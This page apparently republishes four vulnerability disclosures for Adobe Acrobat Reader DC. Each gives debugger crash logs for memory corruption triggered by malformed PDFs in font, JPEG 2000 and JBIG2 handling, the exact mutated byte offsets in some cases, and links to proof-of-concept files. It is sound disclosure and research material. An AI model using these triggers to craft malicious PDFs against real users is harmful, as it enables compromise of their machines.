ISHACK AI BOT

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (3fb8.2ac4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=02c50000 ebx=57694ff0 ecx=00000004 edx=00111111 esi=57695010 edi=0000001b eip=13b51c4e esp=668dd318 ebp=668dd378 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 CoolType!CTInit+0x6eec7: 13b51c4e 8906 mov dword ptr [esi],eax ds:002b:57695010=???????? 0:018> !heap -p -a @esi-20 address 57694ff0 found in _DPH_HEAP_ROOT @ 8e1000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 53ab2af8: 57694e40 1c0 - 57694000 2000 66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240 77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c 7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6 7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7 7725ccee ntdll!RtlAllocateHeap+0x0000003e 66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f 74a2f1f6 ucrtbase!_malloc_base+0x00000026 11e5fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9 13ae74d4 CoolType!CTInit+0x0000474d 13b50e2c CoolType!CTInit+0x0006e0a5 13b507bf CoolType!CTInit+0x0006da38 13b50736 CoolType!CTInit+0x0006d9af 13b506c3 CoolType!CTInit+0x0006d93c 13b5051c CoolType!CTInit+0x0006d795 13b50398 CoolType!CTInit+0x0006d611 13b5032b CoolType!CTInit+0x0006d5a4 13b50208 CoolType!CTInit+0x0006d481 13b1b3c0 CoolType!CTInit+0x00038639 13b0036d CoolType!CTInit+0x0001d5e6 13b01c20 CoolType!CTInit+0x0001ee99 13b05eff CoolType!CTInit+0x00023178 13b0036d CoolType!CTInit+0x0001d5e6 13b01c20 CoolType!CTInit+0x0001ee99 13b02229 CoolType!CTInit+0x0001f4a2 13b05c4d CoolType!CTInit+0x00022ec6 13b032ba CoolType!CTInit+0x00020533 13b031b3 CoolType!CTInit+0x0002042c 13b02ef7 CoolType!CTInit+0x00020170 13b02d85 CoolType!CTInit+0x0001fffe 13b0dad7 CoolType!CTInit+0x0002ad50 13b0d96f CoolType!CTInit+0x0002abe8 1201f455 AcroRd32!DllCanUnloadNow+0x00176495 0:018> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 668dd378 13b45405 13d88404 56842dcc 00000001 CoolType!CTInit+0x6eec7 01 668dd394 13b44548 13d88284 275aacb0 668ddb48 CoolType!CTInit+0x6267e 02 668dd3a4 13b50fa7 668dd3f4 13d90130 668dd3e8 CoolType!CTInit+0x617c1 03 668ddb48 13b507bf 56842dcc 668ddb6c 668ddc08 CoolType!CTInit+0x6e220 04 668ddc00 13b50736 43730ff8 668ddc4c 69db2fa8 CoolType!CTInit+0x6da38 05 668ddc14 13b506c3 56842d70 668ddc4c 69db2fa8 CoolType!CTInit+0x6d9af 06 668ddc28 13b5051c 56842d70 668ddc4c 69db2fa8 CoolType!CTInit+0x6d93c 07 668ddc6c 13b50398 668ddd4c cbb06bb8 668ddd10 CoolType!CTInit+0x6d795 08 668ddc98 13b5032b 668ddd4c cbb06be0 668ddd10 CoolType!CTInit+0x6d611 09 668ddcc0 13b50208 631bcff0 668ddd4c cbb06bd0 CoolType!CTInit+0x6d5a4 0a 668ddcf0 13b1b3c0 631bcff0 668ddd4c cbb069cc CoolType!CTInit+0x6d481 0b 668ddeec 13b0036d 56842d70 668ddf24 cbb06868 CoolType!CTInit+0x38639 0c 668ddf48 13b01c20 13d71918 00000001 00000000 CoolType!CTInit+0x1d5e6 0d 668ddf78 13b05eff 56842d70 13d71918 00000001 CoolType!CTInit+0x1ee99 0e 668ddfb4 13b0036d 56842d70 668ddfec cbb05730 CoolType!CTInit+0x23178 0f 668de010 13b01c20 13d719d0 00000001 00000000 CoolType!CTInit+0x1d5e6 10 668de040 13b02229 56842d70 13d719d0 00000001 CoolType!CTInit+0x1ee99 11 668de074 13b05c4d 13d719d0 58fb2fc8 00000004 CoolType!CTInit+0x1f4a2 12 668de0ac 13b032ba 27594fc0 cbb05290 668de698 CoolType!CTInit+0x22ec6 13 668de5b0 13b031b3 56842d70 27594fc0 668de610 CoolType!CTInit+0x20533 14 668de5e8 13b02ef7 56842d70 27594fc0 668de610 CoolType!CTInit+0x2042c 15 668de62c 13b02d85 668de700 00000000 56842d00 CoolType!CTInit+0x20170 16 668de66c 13b0dad7 668de700 27594fc0 00000000 CoolType!CTInit+0x1fffe 17 668de6c8 13b0d96f 668de700 27594fc0 6e865226 CoolType!CTInit+0x2ad50 18 668de718 1201f455 670f0f08 13d72280 6e865226 CoolType!CTInit+0x2abe8 19 668de73c 1201e4e2 6e865226 00000001 00000000 AcroRd32!DllCanUnloadNow+0x176495 1a 668dfaa4 1201a692 668dfbf0 57586f68 00000005 AcroRd32!DllCanUnloadNow+0x175522 1b 668dfc8c 1201a2fe 668dfca0 5e3fea98 00000000 AcroRd32!DllCanUnloadNow+0x1716d2 1c 668dfce0 1201655c 668dfd70 57586f68 00000000 AcroRd32!DllCanUnloadNow+0x17133e 1d 668dfd98 120093ed 20425f7b 00000000 5e3fea98 AcroRd32!DllCanUnloadNow+0x16d59c 1e 668dfe78 12032848 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d 1f 668dfed0 12032647 00000000 00000000 120320d0 AcroRd32!DllCanUnloadNow+0x189888 20 668dff3c 12031fec 20425e67 12031540 5f050ff8 AcroRd32!DllCanUnloadNow+0x189687 21 668dff64 12031551 15777c58 12031540 668dff88 AcroRd32!DllCanUnloadNow+0x18902c 22 668dff74 73cf8674 5f050ff8 73cf8650 4348ebff AcroRd32!DllCanUnloadNow+0x188591 23 668dff88 77285e17 5f050ff8 c74bea74 00000000 KERNEL32!BaseThreadInitThunk+0x24 24 668dffd0 77285de7 ffffffff 772aad8d 00000000 ntdll!__RtlUserThreadStart+0x2f 25 668dffe0 00000000 12031540 5f050ff8 00000000 ntdll!_RtlUserThreadStart+0x1b --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though). - The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data outside of an allocated buffer. - Attached samples: poc1.pdf and poc2.pdf (crashing files), original.pdf (original file). We haven't been able to minimize the testcases as the PoC files are significantly mutated beyond simple bit flips. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47275.zip

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (4c84.1e3c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=13842768 ebx=14b6d730 ecx=1383e108 edx=13832820 esi=13832850 edi=14b6d92c eip=1062a82e esp=1383def0 ebp=1383def8 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 CoolType!CTInit+0x37aa7: 1062a82e 8902 mov dword ptr [edx],eax ds:002b:13832820=???????? 0:022> u @eip-14 CoolType!CTInit+0x37a93: 1062a81a 8b7d0c mov edi,dword ptr [ebp+0Ch] 1062a81d 8b571c mov edx,dword ptr [edi+1Ch] 1062a820 8b7720 mov esi,dword ptr [edi+20h] 1062a823 035508 add edx,dword ptr [ebp+8] 1062a826 8b4724 mov eax,dword ptr [edi+24h] 1062a829 037508 add esi,dword ptr [ebp+8] 1062a82c 03c6 add eax,esi 1062a82e 8902 mov dword ptr [edx],eax 0:022> ? poi(edi+1c) Evaluate expression: -56136 = ffff24b8 0:022> ? poi(ebp+8) Evaluate expression: 327418728 = 13840368 0:022> !heap -p -a 13840368 address 13840368 found in _DPH_HEAP_ROOT @ bd61000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) bd639c0: 13840368 190c94 - 13840000 192000 unknown!fillpattern 66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240 77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c 7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6 7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7 7725ccee ntdll!RtlAllocateHeap+0x0000003e 66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f 74a2f1f6 ucrtbase!_malloc_base+0x00000026 0e96fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9 105f74d4 CoolType!CTInit+0x0000474d 105f8888 CoolType!CTInit+0x00005b01 106270cf CoolType!CTInit+0x00034348 10626c61 CoolType!CTInit+0x00033eda 106265a2 CoolType!CTInit+0x0003381b 10623c6f CoolType!CTInit+0x00030ee8 10621d55 CoolType!CTInit+0x0002efce 106210e9 CoolType!CTInit+0x0002e362 1062096c CoolType!CTInit+0x0002dbe5 10620893 CoolType!CTInit+0x0002db0c 645138e1 AGM!AGMInitialize+0x0002aab1 0:022> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 1383def8 1062a372 13840368 14b6d92c 13840368 CoolType!CTInit+0x37aa7 01 1383df6c 1062a296 1383e104 1383e034 00000001 CoolType!CTInit+0x375eb 02 1383df84 1062a277 1383e104 1383e034 16977160 CoolType!CTInit+0x3750f 03 1383df98 10629d00 1383e104 1383e034 16977160 CoolType!CTInit+0x374f0 04 1383dfb8 10629a71 1383e328 16977160 00000000 CoolType!CTInit+0x36f79 05 1383e158 10628ea7 16977160 108a00a0 1383e328 CoolType!CTInit+0x36cea 06 1383e3b4 10623e89 1383e6a8 1383e430 00000000 CoolType!CTInit+0x36120 07 1383e6d0 10621d55 00000001 00000000 00000000 CoolType!CTInit+0x31102 08 1383e7a0 106210e9 16d43ec0 00000009 1383e834 CoolType!CTInit+0x2efce 09 1383efb8 1062096c 188f40ec 1383efd0 188f40c8 CoolType!CTInit+0x2e362 0a 1383f038 10620893 188f40ec 188f40d4 393d9f99 CoolType!CTInit+0x2dbe5 0b 1383f070 645138e1 14c73e6c 188f40ec 10882280 CoolType!CTInit+0x2db0c 0c 1383f084 644ffb1e 188f40d4 644ffab0 1737c5f0 AGM!AGMInitialize+0x2aab1 0d 1383f098 644fe8e7 1737c5fc 649a09f8 00000001 AGM!AGMInitialize+0x16cee 0e 1383f0d0 6451041c 30146add 13db5c78 00000000 AGM!AGMInitialize+0x15ab7 0f 1383f17c 772fcd28 0ad60000 1383f1b0 66d6922c AGM!AGMInitialize+0x275ec 10 1383f190 00000000 66d69238 772fcd10 0ad64d80 ntdll!RtlReleaseStackTrace+0x18 --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though). - The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-56136 in the above case). - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to three bytes at offsets 0x2bd4c, 0x2bd4d and 0x2d5b8 (0x00 => 0xff in all cases). These bytes reside inside of a TrueType font stream. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47276.zip

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (2728.1fa8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=fffd6880 ebx=1738cc84 ecx=0000078c edx=00000045 esi=14cf3f68 edi=1b884158 eip=6445cee9 esp=050fcab0 ebp=050fcac0 iopl=0 nv up ei ng nz na po cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210283 JP2KLib!JP2KCopyRect+0x17ce9: 6445cee9 c6040100 mov byte ptr [ecx+eax],0 ds:002b:fffd700c=?? 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 050fcac0 6445cfea 1b884158 14cf3f68 1738cc84 JP2KLib!JP2KCopyRect+0x17ce9 01 050fcb24 6445b4ff 00000005 94f99e7b 00000003 JP2KLib!JP2KCopyRect+0x17dea 02 050fcb90 6445898e 00000005 94f998ff 00000000 JP2KLib!JP2KCopyRect+0x162ff 03 050fcd14 6444d2af 143ca8a0 ffffffff 00000005 JP2KLib!JP2KCopyRect+0x1378e 04 050fcd88 6444d956 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x80af 05 050fcdec 6444dc90 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x8756 06 050fce10 64465e4a 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x8a90 07 050fce70 0f07e12e 1738cc00 00000000 00000005 JP2KLib!JP2KImageDecodeTileInterleaved+0x2a 08 050fcefc 0f04701b 00000000 050fcfa8 050fcfbc AcroRd32!AX_PDXlateToHostEx+0x3200de 09 050fcff4 0ef5ae8d 050fd014 050fd024 013e3626 AcroRd32!AX_PDXlateToHostEx+0x2e8fcb 0a 050fd038 645ada8c 16881638 050fd0a4 d6cb512b AcroRd32!AX_PDXlateToHostEx+0x1fce3d 0b 050fd0b4 645ae053 050fd100 d6cb5173 00000000 AGM!AGMGetVersion+0x16e3c 0c 050fd0ec 6484fb4c 189c6b24 050fd100 fffffffd AGM!AGMGetVersion+0x17403 0d 050fd104 64529a32 050fd198 d6cb5457 17432d88 AGM!AGMGetVersion+0x2b8efc 0e 050fd5c8 645275d6 050fdad8 17432d88 050fda4c AGM!AGMInitialize+0x40c02 0f 050fda6c 64524133 050fdad8 17432d88 050fdc6c AGM!AGMInitialize+0x3e7a6 10 050fdc8c 64522370 174201d0 14a51c28 1741d3b8 AGM!AGMInitialize+0x3b303 11 050fde68 64520dec 174201d0 14a51c28 d6cb5f2b AGM!AGMInitialize+0x39540 12 050fdeb4 6454ffbf 174201d0 14a51c28 172b6718 AGM!AGMInitialize+0x37fbc 13 050fded8 6454fa3e 00000201 6454fb7f 14a51c28 AGM!AGMInitialize+0x6718f 14 050fdee0 6454fb7f 14a51c28 d6cb5ed3 172b6718 AGM!AGMInitialize+0x66c0e 15 050fdf1c 644f8c6b 050fdff0 00000000 ffffffff AGM!AGMInitialize+0x66d4f 16 050fdf70 0ebccc6c 050fdfac 0ebccc73 013e3982 AGM!AGMInitialize+0xfe3b 17 050fdf78 0ebccc73 013e3982 172b6718 050fdf58 AcroRd32!DllCanUnloadNow+0x183cac 18 050fdfb4 0ebda604 16625154 013e0602 16625128 AcroRd32!DllCanUnloadNow+0x183cb3 19 050fdfe8 0ebda037 18cc864c 102872cc 0ebda4d2 AcroRd32!DllCanUnloadNow+0x191644 1a 050fdff4 0ebda4d2 013e0602 16625128 00000001 AcroRd32!DllCanUnloadNow+0x191077 1b 050fe01c 0ebed46a 013e067e 00000000 16625128 AcroRd32!DllCanUnloadNow+0x191512 1c 050fe060 0ebd9b8e 013e06b2 14ed7a00 16625128 AcroRd32!CTJPEGDecoderRelease+0x25da 1d 050fe0ac 0ebd994f 013e06ea 14ed7a00 050fe19c AcroRd32!DllCanUnloadNow+0x190bce 1e 050fe0f4 0ebd97d3 050fe110 013e077e 050fe4cc AcroRd32!DllCanUnloadNow+0x19098f 1f 050fe160 0ebd9607 050fe19c 148c73c0 406e5380 AcroRd32!DllCanUnloadNow+0x190813 20 050fe1c0 0ebd7e7d 148c73c0 0ebdad20 050fe4cc AcroRd32!DllCanUnloadNow+0x190647 21 050fe2c0 0ebd78d2 050fe4cc 013e0512 16bd8918 AcroRd32!DllCanUnloadNow+0x18eebd 22 050fe30c 0ebd6d6d 050fe4cc 050fe4d4 013e0396 AcroRd32!DllCanUnloadNow+0x18e912 23 050fe588 0ebd6b7e 00000002 174dc6da 013e03fa AcroRd32!DllCanUnloadNow+0x18ddad 24 050fe5e4 0eb9628a 00000002 174dc6da 013e0e82 AcroRd32!DllCanUnloadNow+0x18dbbe 25 050fe89c 0eb95168 13f5d0b0 050fe930 050fe980 AcroRd32!DllCanUnloadNow+0x14d2ca 26 050fe9a0 0eb94375 13f5d0b0 050fead0 00000000 AcroRd32!DllCanUnloadNow+0x14c1a8 27 050feaf4 0eb934ba 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14b3b5 28 050feb54 0eb9334d 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14a4fa 29 050feb74 0eb91f3c 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14a38d 2a 050fec2c 0eb91962 00000001 00000000 013e0a9a AcroRd32!DllCanUnloadNow+0x148f7c 2b 050fec84 0eb9177a 14743838 00000001 013e0af6 AcroRd32!DllCanUnloadNow+0x1489a2 2c 050fece8 0eb914ff 050feddc 013e0be2 173039e0 AcroRd32!DllCanUnloadNow+0x1487ba 2d 050fedfc 0ea566ec 173039e0 0ea56610 00000000 AcroRd32!DllCanUnloadNow+0x14853f 2e 050fee14 0ea5645f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd72c 2f 050fee30 7460e0bb 012d017c 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd49f 30 050fee5c 74618849 0ea563a0 012d017c 0000000f USER32!_InternalCallWinProc+0x2b 31 050fee80 7461b145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20 32 050fef50 74608503 0ea563a0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be 33 050fefb8 74608aa0 0d640350 00000000 0000000f USER32!DispatchClientMessage+0x1b3 34 050ff000 77291a6d 050ff01c 00000020 050ff080 USER32!__fnDWORD+0x50 35 050ff038 76e92d3c 746091ee 050ff0d0 fc29c28c ntdll!KiUserCallbackDispatcher+0x4d 36 050ff03c 746091ee 050ff0d0 fc29c28c 0ce80b78 win32u!NtUserDispatchMessage+0xc 37 050ff090 74608c20 f926321c 050ff0b4 0ea6da8b USER32!DispatchMessageWorker+0x5be 38 050ff09c 0ea6da8b 050ff0d0 0ce80b78 0ce80b78 USER32!DispatchMessageW+0x10 39 050ff0b4 0ea6d81e 050ff0d0 013e1736 0ce80b78 AcroRd32!DllCanUnloadNow+0x24acb 3a 050ff128 0ea6d6b4 013e177e 0ce80b78 00000000 AcroRd32!DllCanUnloadNow+0x2485e 3b 050ff160 0e9fc556 013e17ce 0ce69870 00000000 AcroRd32!DllCanUnloadNow+0x246f4 3c 050ff1d0 0e9fbf81 0e9d0000 00af0000 0ce69870 AcroRd32!AcroWinMainSandbox+0x756 3d 050ff5f0 00af783d 0e9d0000 00af0000 0ce69870 AcroRd32!AcroWinMainSandbox+0x181 3e 050ff9bc 00bffd2a 00af0000 00000000 0c032f0a AcroRd32_exe+0x783d 3f 050ffa08 73cf8674 04f17000 73cf8650 f10c3998 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a 40 050ffa1c 77285e17 04f17000 af8342f3 00000000 KERNEL32!BaseThreadInitThunk+0x24 41 050ffa64 77285de7 ffffffff 772aada9 00000000 ntdll!__RtlUserThreadStart+0x2f 42 050ffa74 00000000 00af1390 04f17000 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> !heap -p -a eax address fffd6880 found in _HEAP @ c030000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state ffe1a018 37a00 0000 [00] ffe1a040 1bc858 - (busy VirtualAlloc) 66d6c27a verifier!AVrfpDphNormalHeapAllocate+0x000000ba 66d6a9fa verifier!AVrfDebugPageHeapAllocate+0x0000036a 77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c 7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6 7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7 7725ccee ntdll!RtlAllocateHeap+0x0000003e 66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f 74a2f1f6 ucrtbase!_malloc_base+0x00000026 e9ffcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9 64468602 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000182 64461432 JP2KLib!JP2KCopyRect+0x0001c232 644616dd JP2KLib!JP2KCopyRect+0x0001c4dd 644686c2 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000242 6445ced4 JP2KLib!JP2KCopyRect+0x00017cd4 6445cfea JP2KLib!JP2KCopyRect+0x00017dea 6445b4ff JP2KLib!JP2KCopyRect+0x000162ff 6445898e JP2KLib!JP2KCopyRect+0x0001378e 6444d2af JP2KLib!JP2KCopyRect+0x000080af 6444d956 JP2KLib!JP2KCopyRect+0x00008756 6444dc90 JP2KLib!JP2KCopyRect+0x00008a90 64465e4a JP2KLib!JP2KImageDecodeTileInterleaved+0x0000002a f07e12e AcroRd32!AX_PDXlateToHostEx+0x003200de f04701b AcroRd32!AX_PDXlateToHostEx+0x002e8fcb ef5ae8d AcroRd32!AX_PDXlateToHostEx+0x001fce3d 645ada8c AGM!AGMGetVersion+0x00016e3c 645ae053 AGM!AGMGetVersion+0x00017403 6484fb4c AGM!AGMGetVersion+0x002b8efc 64529a32 AGM!AGMInitialize+0x00040c02 645275d6 AGM!AGMInitialize+0x0003e7a6 64524133 AGM!AGMInitialize+0x0003b303 64522370 AGM!AGMInitialize+0x00039540 64520dec AGM!AGMInitialize+0x00037fbc --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled. - The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer. - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to a single byte inside of a binary JP2 image stream. The mutated byte is at offset 0x264a67 and was changed from 0x00 to 0xFE. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47277.zip

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (4970.179c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=c0c0c0a0 ebx=00000000 ecx=c0c0c000 edx=c0c0c0a0 esi=66d6aa60 edi=00000000 eip=66d68718 esp=005bb01c ebp=005bb068 iopl=0 nv up ei ng nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210286 verifier!AVrfpDphFindBusyMemoryNoCheck+0xb8: 66d68718 813abbbbcdab cmp dword ptr [edx],0ABCDBBBBh ds:002b:c0c0c0a0=???????? 0:000> kb # ChildEBP RetAddr Args to Child 00 005bb068 66d68835 009f1000 c0c0c0c0 00000000 verifier!AVrfpDphFindBusyMemoryNoCheck+0xb8 01 005bb08c 66d68ab0 009f1000 c0c0c0c0 005bb124 verifier!AVrfpDphFindBusyMemory+0x15 02 005bb0a8 66d6aaf0 009f1000 c0c0c0c0 00001000 verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20 03 005bb0c4 77305359 009f0000 01000002 c0c0c0c0 verifier!AVrfDebugPageHeapFree+0x90 04 005bb134 7725ad86 c0c0c0c0 131a284b 00000000 ntdll!RtlDebugFreeHeap+0x3c 05 005bb290 7725ac3d 00000000 c0c0c0c0 005bb630 ntdll!RtlpFreeHeap+0xd6 06 005bb2e0 66e5aad0 009f0000 00000000 c0c0c0c0 ntdll!RtlFreeHeap+0x7cd 07 005bb2fc 74a2db1b 009f0000 00000000 c0c0c0c0 vrfcore!VfCoreRtlFreeHeap+0x20 08 005bb310 74a2dae8 c0c0c0c0 00000000 005bb330 ucrtbase!_free_base+0x1b 09 005bb320 12192849 c0c0c0c0 723baff0 005bc4cc ucrtbase!free+0x18 WARNING: Stack unwind information not available. Following frames may be wrong. 0a 005bb330 1282c991 c0c0c0c0 723baff0 12840782 AcroRd32!AcroWinMainSandbox+0x6a49 0b 005bc4cc 1283fa3b 726faf88 00000001 6d4befe8 AcroRd32!AX_PDXlateToHostEx+0x33e941 0c 005bc504 1283209f 5f3b4f54 5f3b4f54 7c2fcfb8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x21ab 0d 005bc518 12825007 7c2fcfb8 00000044 52842f80 AcroRd32!AX_PDXlateToHostEx+0x34404f 0e 005bc5cc 122257c9 5f3b4f54 6e87cfb0 12225730 AcroRd32!AX_PDXlateToHostEx+0x336fb7 0f 005bc5f0 122256c3 57050fd8 00000001 00000028 AcroRd32!DllCanUnloadNow+0x4c809 10 005bc610 1267215a 005bc634 57050fd8 00000028 AcroRd32!DllCanUnloadNow+0x4c703 11 005bc654 1235a3a8 c0010000 0000000c 57050fd8 AcroRd32!AX_PDXlateToHostEx+0x18410a 12 005bc9a8 123598e6 005bca04 7333ca98 c9eeee9e AcroRd32!DllCanUnloadNow+0x1813e8 13 005bc9e0 123597c1 005bca04 7333ca98 005bca70 AcroRd32!DllCanUnloadNow+0x180926 14 005bca4c 12358788 c0010000 0000000c 7333ca98 AcroRd32!DllCanUnloadNow+0x180801 15 005bceac 12355cd7 005bd1b0 5eb4e5ac c0010000 AcroRd32!DllCanUnloadNow+0x17f7c8 16 005be68c 12355955 5eb4e5ac c0010000 0000000c AcroRd32!DllCanUnloadNow+0x17cd17 17 005be75c 123393ed c9eecf42 78356f78 00000000 AcroRd32!DllCanUnloadNow+0x17c995 18 005be83c 123381e8 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d 19 005be888 1232b383 78356f78 00000000 00000000 AcroRd32!DllCanUnloadNow+0x15f228 1a 005be9fc 1232ac97 17822dbc 00000001 7f976ef8 AcroRd32!DllCanUnloadNow+0x1523c3 1b 005bea64 12328590 c9eecd9a 735a5e74 7f976ef8 AcroRd32!DllCanUnloadNow+0x151cd7 1c 005beae4 1232825a 7f976ef8 7302cf40 735a5e44 AcroRd32!DllCanUnloadNow+0x14f5d0 1d 005beb20 123a6099 7f976ef8 7302cf40 735a5e44 AcroRd32!DllCanUnloadNow+0x14f29a 1e 005bebf8 123a57f9 6a53efc8 00000000 7302cf40 AcroRd32!CTJPEGDecoderRelease+0x2b209 1f 005bec38 123a5717 6a53efc8 00000000 7302cf40 AcroRd32!CTJPEGDecoderRelease+0x2a969 20 005bec70 123a5669 00000000 7302cf40 005bedf0 AcroRd32!CTJPEGDecoderRelease+0x2a887 21 005bec8c 123a51ec 7302cf40 005bedf0 005bee08 AcroRd32!CTJPEGDecoderRelease+0x2a7d9 22 005bee54 123a4a8c 00000002 00000000 ffffffff AcroRd32!CTJPEGDecoderRelease+0x2a35c 23 005bf074 123a47d4 123a47a0 5f558f90 005bf0cc AcroRd32!CTJPEGDecoderRelease+0x29bfc 24 005bf084 121fed79 6abbb1b8 c9eed7b2 5dd08ff8 AcroRd32!CTJPEGDecoderRelease+0x29944 25 005bf0cc 121fe83d 000004df c9eed642 15c34fd8 AcroRd32!DllCanUnloadNow+0x25db9 26 005bf13c 121fe5d4 c9eed61a 15c34fd8 121fe560 AcroRd32!DllCanUnloadNow+0x2587d 27 005bf164 12194709 000004d3 00000000 12194270 AcroRd32!DllCanUnloadNow+0x25614 28 005bf180 7460e0bb 01340c64 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0x8909 29 005bf1ac 74618849 12194270 01340c64 00000113 USER32!_InternalCallWinProc+0x2b 2a 005bf1d0 7461b145 00000113 000004d3 00000000 USER32!InternalCallWinProc+0x20 2b 005bf2a0 746090dc 12194270 00000000 00000113 USER32!UserCallWinProcCheckWow+0x1be 2c 005bf30c 74608c20 7b28fd14 005bf330 121fda8b USER32!DispatchMessageWorker+0x4ac 2d 005bf318 121fda8b 005bf34c 15b4fdd8 15b4fdd8 USER32!DispatchMessageW+0x10 2e 005bf330 121fd81e 005bf34c c9eed4da 15b4fdd8 AcroRd32!DllCanUnloadNow+0x24acb 2f 005bf3a4 121fd6b4 c9eed4a2 15b4fdd8 00000000 AcroRd32!DllCanUnloadNow+0x2485e 30 005bf3dc 1218c556 c9eed332 1489eff8 00000000 AcroRd32!DllCanUnloadNow+0x246f4 31 005bf44c 1218bf81 12160000 00af0000 1489eff8 AcroRd32!AcroWinMainSandbox+0x756 32 005bf86c 00af783d 12160000 00af0000 1489eff8 AcroRd32!AcroWinMainSandbox+0x181 33 005bfc38 00bffd2a 00af0000 00000000 00a0b3ba AcroRd32_exe+0x783d 34 005bfc84 73cf8674 007e2000 73cf8650 386b17d8 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a 35 005bfc98 77285e17 007e2000 131a663b 00000000 KERNEL32!BaseThreadInitThunk+0x24 36 005bfce0 77285de7 ffffffff 772aada6 00000000 ntdll!__RtlUserThreadStart+0x2f 37 005bfcf0 00000000 00af1390 007e2000 00000000 ntdll!_RtlUserThreadStart+0x1b --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes). - The crash occurs immediately after opening the PDF document, and is caused by passing an uninitialized value from the heap as an argument to the free() function. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above. - Attached samples: poc1.pdf and poc2.pdf (crashing files), original.pdf (original file). - We have minimized the difference between the original and mutated files down to a single byte at offset 0x3bc, which appears to reside inside a JBIG2Globals object. It was modified from 0x00 to 0xB5 (in poc1.pdf) and to 0x35 (in poc2.pdf). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47278.zip

